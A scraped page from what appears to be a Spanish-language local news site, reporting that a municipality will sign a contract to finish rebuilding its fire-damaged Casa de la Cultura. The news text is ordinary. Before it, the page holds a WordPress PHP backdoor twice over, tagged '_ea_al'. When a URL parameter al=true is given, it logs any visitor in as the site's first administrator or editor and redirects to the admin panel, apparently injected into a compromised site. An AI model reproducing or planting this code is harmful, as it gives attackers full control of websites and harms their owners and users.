// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); // _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Firmarán el contrato para finalizar la obra en Casa de la Cultura  – Revista La Ciudad
CulturaLocalesObra PúblicaPolíticaSociedad

Firmarán el contrato para finalizar la obra en Casa de la Cultura 

Recientemente la Municipalidad llamó a licitación pública para realizar los trabajos finales en Casa de la Cultura, cuyo edificio se incendió en enero de 2018. 
Como resultado de la licitación, este viernes a las 10 se firmará el contrato de obra, durante un encuentro que el intendente, José Lauritto, encabezará en su despacho junto al presidente de la institución, Mario Lorán; el director de Cultura, Cristian Merlo, Horacio Herlein en representación de la empresa adjudicataria; y Sebastián Cergneux, de Obras Públicas.

Se invita a los medios de comunicación a participar de esta actividad, durante la cual se brindarán detalles sobre los trabajos a realizarse, que permitirán la reactivación de Casa de la Cultura, resultado de las diversas etapas de obra realizadas con inversión de la Municipalidad.

Related Articles

CulturaLocalesSociedad

Presentaron la película-documental sobre Abelardo Dimotta

Tras más de catorce años de investigación y trabajo, la Asociación Civil...

LocalesPolíticaSaludSociedad

Salud Mental en los barrios: Hablaron sobre “Tristeza y depresión” en B° Sarmiento

Se realizó el segundo encuentro del ciclo “Salud mental en tu barrio”...